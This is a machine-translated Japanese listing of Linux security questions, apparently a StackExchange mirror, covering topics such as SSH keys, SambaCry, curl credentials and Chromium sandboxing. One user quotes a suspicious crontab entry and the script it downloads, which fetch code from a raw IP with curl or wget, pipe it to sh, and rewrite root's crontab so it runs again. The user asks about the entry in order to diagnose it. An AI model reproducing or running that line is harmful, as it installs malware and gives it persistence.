タグ付けされた質問 「security」

コンピュータのセキュリティに関連するコンテンツ、つまり必要なポリシー、メカニズムなどに関するコンテンツは、データが漏洩したり破損したりしていないこと、およびあらゆる状況でサービスを利用できることを確認します。

3
サーバー管理者から使用する秘密キーが送られてきました。どうして?
会社のステージングサーバーとライブサーバーを展開ループにリンクするために、サーバーにアクセスすることになっています。側の管理者が2つのインスタンスをセットアップしてから、サーバーにユーザーを作成し、SSHでログインします。これほど私は慣れています。 今、私の頭の中では、承認されたキーフォルダー内に配置できる公開キーを送信します。代わりに、彼らは私にファイルid_rsa内に-----BEGIN RSA PRIVATE KEY-----電子メールを含むファイル名を送信しました。これは正常ですか? 私は周りを見回して、ゼロから自分のキーを生成およびセットアップするための膨大なリソースを見つけることができますが、サーバーの秘密キーから開始することについては何もありません。これを使用して自分用のキーを生成する必要がありますか? 私はシステム管理者に直接尋ねますが、馬鹿に見えて、私たちの間の時間を無駄にしたくありません。彼が私に送ったキーを無視して、彼らの許可されたフォルダの中に私の公開キーを入れるように頼むべきですか?

2
Linuxシステム上の「WannaCry」:どうやって自分を守るのですか?
rapid7の記事によると、 Linuxシステムでのリモートコード実行を許可する脆弱なSambaバージョンがいくつかあります。 一方でWannaCryの ransomwormは、Windowsシステムに影響を与え、容易に識別し、明確な修復手順で、Sambaの脆弱性は、LinuxおよびUnixシステムに影響を与えますし、適切な是正を取得するか、展開に重要な技術的障害を提示することができます。 CVE-2017-7494 3.5.0以降のSambaのすべてのバージョンは、リモートコード実行の脆弱性に対して脆弱であり、悪意のあるクライアントが共有ライブラリを書き込み可能な共有にアップロードし、サーバーにロードして実行させることができます。 可能な攻撃シナリオ: 2つの要素から始めます。 Sambaの脆弱性は、一部のLinuxディストリビューションではまだ修正されていません。 一部のLinuxカーネルバージョン(たとえば、4.8.0-41-generic UbuntuカーネルのCVE-2017-7308)には、パッチが適用されていないローカル権限昇格の脆弱性があります。 攻撃者はLinuxマシンにアクセスし、ローカルエクスプロイトの脆弱性を使用して特権を昇格させ、ルートアクセスを取得し、このモックアップLinux用WannaCryランサムウェアと同様に、将来の可能性のあるランサムウェアをインストールできます 。 更新 最新の記事「警告!ハッカーは「SambaCryの欠陥」を使用してLinuxシステムをハックし始めました」は、Sambacryの欠陥を使用してLinuxマシンに感染する方法を示しています。 Kaspersky Labの研究者チームによって設定されたハニーポットは、SambaCryの脆弱性を悪用してマルウェア暗号化マイニングソフトウェアをLinuxコンピューターに感染させるマルウェアキャンペーンを捕捉したため、予測は非常に正確であることが判明しました。 別のセキュリティ研究者であるOmri Ben Bassatは、同じキャンペーンを独自に発見し、「EternalMiner」と名付けました。 研究者によると、Sambaの欠陥が公表されてから1週間後に、未知のハッカーグループがLinux PCのハイジャックを開始し、「Monero」デジタル通貨をマイニングする暗号通貨マイニングソフトウェア「CPUminer」のアップグレードバージョンをインストールしました。 SambaCryの脆弱性を使用して脆弱なマシンを侵害した後、攻撃者は標的のシステムで2つのペイロードを実行します。 INAebsGB.so —攻撃者へのリモートアクセスを提供する逆シェル。 cblRWuoCc.so —暗号通貨マイニングユーティリティを含むバックドア– CPUminer。 2017年7月18日に投稿されたTrendLabレポート:LinuxユーザーはSambaCryを悪用して新しい脅威として更新することを求めている 攻撃を受けるのを防ぐためにLinuxシステムを保護するにはどうすればよいですか?

7
マシンからのすべての発信要求/接続を監視するにはどうすればよいですか?
私のマシンはサーバーですので、サーバーへの接続を無視したいと思います(誰かが私のWebサイトにアクセスしたときなど)。サーバーから他の場所への接続/要求のみを確認したい。 発信接続のみを表示するにはどうすればよいですか? 編集:私はこれらのタイプのものに新しいです。私がやろうとしているのは、私のウェブアプリのデータ以外にサーバーから何かが送信されているかどうかを確認することです。たとえば、誰かが私のWebサイトにアクセスすると、明らかにサーバーがクライアントのブラウザーにデータを送信します。しかし、統計情報データを知らない他の場所に送信するコードが、私のWebアプリのフレームワークのどこかにあるとします。サーバーがデータを送信している場所があれば、それを確認したいと思います。おそらくそうではないかもしれませんが、あなたが書いていないphpまたはnodejsフレームワークを使用することに決めたとしましょう。何らかのタイプのデータをどこかに送信する可能性はわずかです。もしそうなら、それは私が見たいものです。

3
curlは、ps出力にパスワードが表示されないようにどのように保護しますか?
curlコマンドライン引数として指定されたユーザー名とパスワードがps出力に表示されないことに少し前に気付きました(もちろん、bash履歴に表示される場合があります)。 彼らも同様に現れません/proc/PID/cmdline。 (ただし、ユーザー名とパスワードを組み合わせた引数の長さは導出できます。) 以下のデモ: [root@localhost ~]# nc -l 80 & [1] 3342 [root@localhost ~]# curl -u iamsam:samiam localhost & [2] 3343 [root@localhost ~]# GET / HTTP/1.1 Authorization: Basic aWFtc2FtOnNhbWlhbQ== User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2 Host: localhost Accept: */* [1]+ Stopped nc -l 80 [root@localhost ~]# jobs [1]+ …

18
ルートパスワードを変更できないルートアクセス?
サーバーで少し問題が発生しています。一部のユーザーはsudo、たとえばrootになり、rootになることができるはずですが、rootパスワードを変更できないという制限があります。つまり、他のユーザーが何をしても、そのサーバーにログインしてrootになることができるという保証です。 それは可能ですか?
66 ubuntu  security  sudo 

4
コマンドが履歴に追加されないようにする方法はありますか?
コマンドが履歴に追加されないようにする方法はありますか?履歴ファイルに保存したくないコマンドがあり、メモリに保存されている履歴を検索するときにそこに保存することはあまり気にしませんが、それは心配ではありません。これを防ぐ方法はありますか、または戻って履歴ファイルを編集する必要がありますか? 更新:これがシェル固有である可能性があることを知りませんでした。私のシェルはzsh。他のシェルについても回答してください。そうすれば、シェルでこれを行う方法がわかります。

2
仕事のためにSSH公開キーを配布しても安全ですか?
現在、メンテナンスとアップグレードのために定期的にサーバーにアクセスする必要がある多くの組織でリモートで作業しています。RSA公開SSHキーを.ssh/authorized_keysファイルに追加して、パスワードを検索することなく、はるかに高速でログインできるようにすることは安全ですか?私は公開鍵から秘密鍵を生成することは不可能であるという仮定の下で運営していますが、私は自分の仮定に正しいのですか? さらに一歩進めて、RSA公開キーの内容をインターネットに投稿することでセキュリティ上のリスクはありますか?私の秘密鍵が取得された場合、私は多くの問題に直面していることを知っていますが、それ以外に、実際に起こりうるセキュリティ上の脅威はありますか?

4
/ var、/ homeを別のパーティションに移動する
私は(のようないくつかのフォルダに移動しようとしています/varとを/homeこのガイドを読んだ後、別のパーティションに): 3.2.1インテリジェントパーティションスキームの選択 このガイドに従って、 1つのフォルダーを正常に移動できました。 ただし、複数のフォルダーでは機能しないようで、すべてのフォルダーが適切なフォルダーなしでパーティションにダンプされます。 私は、マウントしたい/var、/homeと/tmp別のパーティションへ。誰かがこれについて私を導くことができますか?

2
15分ごとに「xribfa4」を実行する疑わしいcrontabエントリ
Raspberry Piのルートcrontabファイルに何かを追加したかったのですが、Googleでその一部を検索しても疑わしいエントリが見つかりませんでした。 crontabエントリ: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh 内容は次のhttp://103.219.112.66:8000/i.shとおりです。 export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/root echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root cp -f /var/spool/cron/root /var/spool/cron/crontabs/root …
59 security  cron  malware 

2
Chromiumオプションの `--no-sandbox`はどういう意味ですか?
私はChromiumを次のように実行しています: chromium --no-sandbox OpenVZ VMコンテナでDebian Squeezeを実行しているので、これを実行しています。これが唯一の方法です。 私は読み続けますが、これはひどいです。しかし、私は正確にその理由を知りたいです。誰かがそれを私に説明してもらえますか? 誰かがあなたのコンピューターにハッキングして損害を与える必要がありますか?または、この脆弱性はJavaScriptファイルのようなWeb上のファイルに由来しますか? 一握りの「信頼できる」サイトのみにブラウジングをロックダウンした場合はどうなりますか?(Gmail、stackexchange(もちろん)、facebook)

1
最初の1024ポートがrootユーザーのみに制限されているのはなぜですか?
これは、他の何よりも怠idleな好奇心です。友人から「Linuxでrootだけが使用できるポート範囲はどれですか?」私は彼に0-1024が制限されていると言いました。それから彼は私にそれがなぜそうだったか尋ね、…私は途方に暮れていた。まったくわからない。 これらのポートが制限され、1025-65535が制限されない理由はありますか? ほとんどの主要なネットワークサービス(HTTP、FTP、SSH、Telnet、HTTPS、POP、SMTPなど)はこの範囲にあるため、考えられる答えは次のとおりです。 信頼できないユーザーは、これらのポートでログオンの詳細をリッスンするプログラムを実行できます。 信頼できないユーザーが不正なサーバーアプリケーションを実行する可能性があります。 誰もがここに光を当てることができますか?

5
Mutt:パスワードを安全に保存する方法は?
私の.muttrcファイルは次のようになります。この1か垣間見る下記を参照してください。私はパスワードにためらっています。使用するパスワードをどのように保存すればよいmuttですか? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real Name"
52 security  mutt 

3
Amazon .pemキーをPutty .ppkキーLinuxに変換する
.pemAWSから秘密鍵を生成してダウンロードしました。ただし、仮想マシンに接続するためにPuttyを使用するには、そのキーの.ppk形式が必要です。変換のプロセスは、ここで約20行で詳しく説明されています。 http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty 私はLinux Mint(Ubuntuディストリビューション)を使用しており、ターミナルでputtygenを使用できることを知っています。ただし、このツールの使用方法も、必要なパラメーターの構成方法もわかりません。puttygen --helpと入力すると、 PuTTYgen unidentified build, Aug 7 2013 12:24:58 Usage: puttygen ( keyfile | -t type [ -b bits ] ) [ -C comment ] [ -P ] [ -q ] [ -o output-keyfile ] [ -O type | -l | -L | -p ] -t specify …

2
PIDを持たないプロセスを識別する方法は?
45136 / tcpと37208 / udpの2つのポートをリッスンするプロセスがあります(実際には同じプロセスであると想定しています)。しかし、netstatはpidを返しません。 netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - 「grep 37208」と同じ結果。 私もlsofを試しました: lsof -i TCP:45136 しかし、何も返されません。これはsqueezeの新しいインストールであり、このプロセスが何であるかは本当にわかりません。何か案が ? 回答 あなたのコメントに感謝します。nfs-server nfs-commonをアンインストールし(dkpg --get-selections | grep nfs searchの後)、不明なプロセスが消えました。奇妙なことに、カーネルプロセスはどのようにもマークされていません。 再びお二人に感謝します。;)

7
ディレクトリツリー全体を再帰的に細断処理す​​るにはどうすればよいですか?
Linuxの「シュレッド」ユーティリティでシュレッドしたいディレクトリツリーがあります。残念ながら、シュレッドには-R再帰的シュレッディングのオプションがありません。 ディレクトリツリー全体を再帰的に細断処理す​​るにはどうすればよいですか?

弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.